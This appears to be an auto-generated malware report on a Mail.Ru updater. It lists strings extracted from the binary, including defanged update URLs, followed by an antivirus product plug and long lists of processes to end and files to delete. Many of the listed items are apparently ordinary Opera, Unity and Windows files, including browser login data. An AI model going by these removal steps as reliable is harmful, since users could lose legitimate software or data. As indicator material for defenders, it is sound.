Updater.Mail.Ru: Error during coping file, rc =
Service::Update update operation is proceed
Updater.Mail.Ru: StartService: RegisterServiceCtrlHandler returned error
Updater.Mail.Ru: StartService: SetServiceStatus returned error
Updater.Mail.Ru: SERVICE_CONTROL_STOP
Updater.Mail.Ru: SERVICE_CONTROL_INTERROGATE
Updater.Mail.Ru: SERVICE_CONTROL_SHUTDOWN
%1% (%2%)
\StringFileInfo\xx
notepad.exe
SOFTWARE/Microsoft/Windows/CurrentVersion/Policies/System
0123456789 ,.
Software/Microsoft/Windows/CurrentVersion/Explorer/Shell Folders
sqlite3_prepare16_v2
sqlite3_step
sqlite3
SQLite error %1% returned by %2%
SQLite error code %1%, file %2%
sAbsolutePath: <%s>
Incorrect firefox js file
stub.exe
hXXp://xml.binupdate.mail.ru/tenv.mrdj
filter.cfg
metrics.csv
http.csv
%Y%m%d
%Y-%m-%d
%H:%M:%S
%Y%m%dT%H%M%S%F%q
%Y-%m-%d %H:%M:%S%F%Q
%Y-%b-%d %H:%M:%S%F %z
%O:%M:%S%F
Invalid url
jMail.ru/ifrm
SOFTWARE/Mail.ru
Internet Explorer/iexplore.exe
Global\651CB287-2277-4F76-84C6-1D61E868304B
Mail.ru/CommonCache
HTTP code %1%
%Y-%b-%d
l%Y%m%d
SOFTWARE/Microsoft/Windows/CurrentVersion/Explorer/Shell Folders
asio-58CCDC44-6264-4842-90C2-F3C545CB8AA7-%u-%p
hXXp://xml.binupdate.mail.ru/cache_policy.mrdj
rCachingPolicy/Urls
mscoree.dll
madvapi32.dll
skernel32.dll
combase.dll
- floating point support not loaded
- CRT not initialized
- Attempt to initialize the CRT more than once.
portuguese-brazilian
888816666554443
6666554443
!6666554443
%5N.log
%Program Files%\Mail.Ru\MailRuUpdater\MailRuUpdater.exe
Mail.Ru updater
1.17.0.150






Remove it with Ad-Aware




    

  1. Click (here) to download and install Ad-Aware Free Antivirus.
    2. 

  2. Update the definition files.
    3. 

  3. Run a full scan of your computer.
    4. 





Manual removal*




    

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):
    

    6.tmp.exe:2524
    6.tmp.exe:2540
    6.tmp.exe:2444
    6.tmp.exe:2488
    6.tmp.exe:2496
    6.tmp.exe:2452
    26.tmp.exe:2440
    UnityWebPlayer.exe:3196
    1.tmp.exe:496
    1.tmp.exe:1288
    opera.exe:2936
    opera.exe:2892
    opera.exe:2828
    opera.exe:2796
    installer.exe:3724
    installer.exe:1364
    amisetup9338__14991.exe:912
    amisetup9364__14991.exe:1752
    opera_installer_20151219212422.exe:3408
    opera_installer_20151219212422.exe:3448
    amigo.exe:2536
    opera_autoupdate.exe:3736
    opera_autoupdate.exe:3572
    launcher.exe:3612
    launcher.exe:2296
    setup.exe:2672
    MailRuUpdater.exe:3616
    MailRuUpdater.exe:3160
    MailRuUpdater.exe:3536
    opera_crashreporter.exe:2468
    

    2. 

  2. Delete the original Trojan file.
    3. 

  3. Delete or disinfect the following files created/modified by the Trojan:
    

    %Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422.log (5399 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\localization\be.pak (208 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\resources\standard_themes\grey.zip (289 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\Assets\150x150Logo.scale-80.png (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\resources\1CF37043-6733-479C-9086-7B21A2292DDA.ico (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\localization\cs.pak (149 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\localization\da.pak (138 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\opera.exe (3703 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\opera_autoupdate.version (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\localization\pt-BR.pak (146 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\Assets\70x70Logo.scale-80_contrast-white.png (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\localization\ca.pak (151 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\localization\es-419.pak (149 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\localization\zh-CN.pak (123 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\localization\nb.pak (136 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\localization\nl.pak (141 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\Assets\150x150Logo.scale-180.png (7 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\Assets\70x70Logo.scale-80.png (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\localization\en-US.pak (128 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\Assets\70x70Logo.scale-140_contrast-white.png (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\opera.dll (465369 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\localization\de.pak (151 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\opera_150_percent.pak (7386 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\localization\he.pak (165 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\d3dcompiler_47.dll (22433 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\localization\fr.pak (154 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\resources\default_partner_content.json (261 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\localization\sw.pak (139 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\resources\AD2FD2BD-0727-4AF7-8917-AAED8627ED47.ico (1 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\8DFDF057024880D7A081AFBF6D26B92F (176 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\localization\bn.pak (303 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\osmesa.dll (20507 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\files_list (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\installer.exe (7386 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\resources\license.txt (18 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\resources\C665D993-1B49-4C2E-962C-BEB19993BB86.ico (17 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\localization\pl.pak (149 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\Assets\70x70Logo.scale-180_contrast-white.png (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\msvcp100.dll (1702 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\resources\013E742B-287B-4228-A0B9-BD617E4E02A4.ico (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\localization\id.pak (134 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\localization\es.pak (145 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\localization\me.pak (139 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\398EE64D66758B5715368AA94044B13A (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\localization\hr.pak (144 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\Assets\150x150Logo.scale-100.png (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\localization\uk.pak (236 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\localization\mk.pak (218 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\resources\76C397A8-9E8E-4706-8203-BD2878E9C618.ico (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\7.tmp (235 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\opera_100_percent.pak (7386 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\opera_200_percent.pak (9606 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\Assets\150x150Logo.scale-140_contrast-white.png (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\resources\3B6191A0-8BF3-11E2-9E96-0800200C9A66.ico (5 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\Resources.pri (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\resources\standard_themes\default_theme.zip (218 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\resources\ab_tests.json (560 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\localization\vi.pak (166 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\localization\sk.pak (146 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\localization\en-GB.pak (128 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\mojo_public_test_support.dll (82 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\resources\CCCED631-6DA2-4060-9824-95737E64350C.ico (17 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\localization\th.pak (279 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\resources\2A3F5C20-8BF5-11E2-9E96-0800200C9A66.ico (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\localization\tr.pak (145 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\localization\fy.pak (137 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\Assets\70x70Logo.scale-100.png (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\resources\default_localized_themes.json (100 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\localization\uz.pak (215 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\Assets\notification_default.png (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\localization\fr-CA.pak (147 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\resources\1AF2CDD0-8BF3-11E2-9E96-0800200C9A66.ico (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\localization\te.pak (309 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\resources\standard_themes\darkbreeze.zip (243 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\dbghelp.dll (7386 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\Assets\150x150Logo.scale-180_contrast-white.png (5 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\resources\F98D4D4C-8AA7-4619-A1E7-AC89B24558DD.ico (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\resources\FFF3F819-B6CE-4DE6-B4E4-8E2618ABC0D9.ico (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\resources\CFCE84E5-9A95-4B3F-B8E4-3E98CF7EE6C5.ico (34 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\launcher.exe (3770 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\resources\standard_themes\reine.zip (53 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\libEGL.dll (81 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\localization\nn.pak (131 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\launcher.visualelementsmanifest.xml (317 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\localization\zh-TW.pak (131 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\resources\FF57F01A-0718-44B7-8A1F-8B15BC33A50B.ico (5 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\win8_importing.dll (94 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\clearkeycdmadapter.dll (208 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\opera_autoupdate.licenses (14 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\Opera_34.0.2036.41_Setup[1].exe (17837417 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\localization\zu.pak (141 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\resources\6D3582E1-6013-429F-BB34-C75B90CDD1F8.ico (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\resources\FDC2CCAB-E8F9-4620-91DD-B0B67285997C.ico (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\localization\fi.pak (141 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\Assets\150x150Logo.scale-100_contrast-white.png (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\localization\pt-PT.pak (146 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\6.tmp.exe (4545 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\resources\standard_themes\landscape_photo.zip (299 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\resources\B478FE0C-0761-41C3-946F-CD1340356039.ico (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\message_center_win8.dll (158 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\resources\66DD4BB6-A3BA-4B11-AF7A-F4BF23E073B2.ico (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\localization\sv.pak (138 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\localization\gd.pak (162 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\localization\af.pak (137 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\localization\az.pak (152 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\localization\hi.pak (286 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\resources\0CD5F3A0-8BF6-11E2-9E96-0800200C9A66.ico (17 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\Assets\150x150Logo.scale-80_contrast-white.png (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\msvcr100.dll (3847 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\wow_helper.exe (73 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\resources\5BBBDD5B-EDC7-4168-9F5D-290AF826E716.ico (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\localization\ja.pak (182 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\localization\lv.pak (152 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\localization\sr.pak (215 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\localization\ru.pak (221 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\localization\bg.pak (221 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\Assets\70x70Logo.scale-140.png (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\localization\ko.pak (153 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\icudtl.dat (76792 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\localization\pa.pak (266 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\opera_125_percent.pak (5442 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\Assets\70x70Logo.scale-180.png (4 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\398EE64D66758B5715368AA94044B13A (196 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\localization\ro.pak (152 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\localization\fil.pak (154 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\resources\2F8F0E41-F521-45A4-9691-F664AFAFE67F.ico (17 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\resources\07593226-C5C5-438B-86BE-3F6361CD5B10.ico (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\localization\it.pak (147 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\localization\hu.pak (153 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422.7z (261193 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\root_files_list (729 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\localization\el.pak (244 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\opera_crashreporter.exe (1785 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\localization\ms.pak (139 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\opera.pak (140036 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\clearkeycdm.dll (7386 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422.exe (17837417 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\resources\8D754F20-8BF5-11E2-9E96-0800200C9A66.ico (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\Assets\70x70Logo.scale-100_contrast-white.png (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\libGLESv2.dll (12288 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\localization\kk.pak (211 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\server_tracking_data (641 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\opera_250_percent.pak (3911 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\snapshot_blob.bin (1795 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\natives_blob.bin (1720 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\widevinecdmadapter.dll (208 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\resources\3BFDFA54-5DD6-4DFF-8B6C-C1715F306D6B.ico (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\resources\F3F34CBB-24FF-4830-9E87-1663E7A0A5EE.ico (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\opera_autoupdate.exe (25429 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\Assets\150x150Logo.scale-140.png (5 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\resources\dictionaries.xml (11 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\localization\lt.pak (150 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\8DFDF057024880D7A081AFBF6D26B92F (533 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\localization\ta.pak (1612 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\resources\CFD4BE41-4C6D-496A-ADDB-4095DFA1DD0E.ico (5 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\resources\4C95ADC1-5FD9-449D-BC75-77CA217403AE.ico (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\CR_14A70.tmp\SETUP.EX_ (1659 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\CR_14A70.tmp\setup.exe (17080 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\CR_14A70.tmp\CHROME.PACKED.7Z (366388 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Unity\WebPlayer\loader\UnityWebPluginAX.ocx (6360 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Unity\WebPlayer\loader\npUnity3D32.dll (32784 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsl33.tmp (67936 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Unity\WebPlayer\loader\info.plist (192 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Unity\WebPlayer\Uninstall.exe (6078 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsa34.tmp\UserInfo.dll (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Unity\WebPlayer\UnityWebPlayerUpdate.exe (19592 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsa34.tmp\UAC.dll (784 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Unity\WebPlayer\UnityBugReporter.exe (25112 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsa34.tmp\System.dll (11 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Unity\WebPlayer\loader\UnityWebPlayerNP.map (12536 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\awh2.tmp (174 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\awh3.tmp (97548 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\awh4.tmp (174 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\awh5.tmp (97548 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Cab9.tmp (54 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\etilqs_j8UY4HJBbD6HK4M (286 bytes)
    %Documents and Settings%\%current user%\Application Data\Opera Software\Opera Stable\Local Storage\browser_startpage_0.localstorage (299 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\2D0EAFE99DD0474CD3DF1720DC4B3759 (85 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\CabC.tmp (54 bytes)
    %Documents and Settings%\%current user%\Application Data\Opera Software\Opera Stable\Extension State\000001.dbtmp (20 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\TarE.tmp (2712 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Opera Software\Opera Stable\Cache\index (368 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\C8E7EC0C85688F4738F3BE49B104BA67 (344 bytes)
    %Documents and Settings%\%current user%\Application Data\Opera Software\Opera Stable\18.tmp (409 bytes)
    %Documents and Settings%\%current user%\Application Data\Opera Software\Opera Stable\History Provider Cache (443 bytes)
    %Documents and Settings%\%current user%\Application Data\Opera Software\Opera Stable\F.tmp (46 bytes)
    %Documents and Settings%\%current user%\Application Data\Opera Software\Opera Stable\24.tmp (74 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\etilqs_b4ioryJksPsMDbo (131 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Tar1E.tmp (2712 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\0A2EA55F20CC96EF43A26E7FAF8A2217 (7818 bytes)
    %Documents and Settings%\%current user%\Application Data\Opera Software\Opera Stable\2F.tmp (32 bytes)
    %Documents and Settings%\%current user%\Application Data\Opera Software\Opera Stable\23.tmp (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Opera Software\Opera Stable\Local Storage\chrome-extension_knohfebhibeknbfioecpdmdkjkjdnjnl_0.localstorage (299 bytes)
    %Documents and Settings%\%current user%\Application Data\Opera Software\Opera Stable\Local Storage\chrome-extension_knohfebhibeknbfioecpdmdkjkjdnjnl_0.localstorage-journal (5545 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Cab16.tmp (49 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Tar13.tmp (2712 bytes)
    %Documents and Settings%\%current user%\Application Data\Opera Software\Opera Stable\Favicons (11574 bytes)
    %Documents and Settings%\%current user%\Application Data\Opera Software\Opera Stable\28.tmp (32 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015 (147 bytes)
    %Documents and Settings%\%current user%\Application Data\Opera Software\Opera Stable\themes_backup\default_theme.zip (1281 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015 (1224 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Cab10.tmp (54 bytes)
    %Documents and Settings%\%current user%\Application Data\Opera Software\Opera Stable\25.tmp (54 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Opera Software\Opera Stable\Cache\data_2 (1592 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Opera Software\Opera Stable\Cache\data_3 (1928 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Opera Software\Opera Stable\Cache\data_0 (20156 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Opera Software\Opera Stable\Cache\data_1 (17256 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\40C68D5626484A90937F0752C8B950AB (320 bytes)
    %Documents and Settings%\%current user%\Application Data\Opera Software\Opera Stable\Login Data-journal (532 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\69C6F6EC64E114822DF688DC12CDD86C (232 bytes)
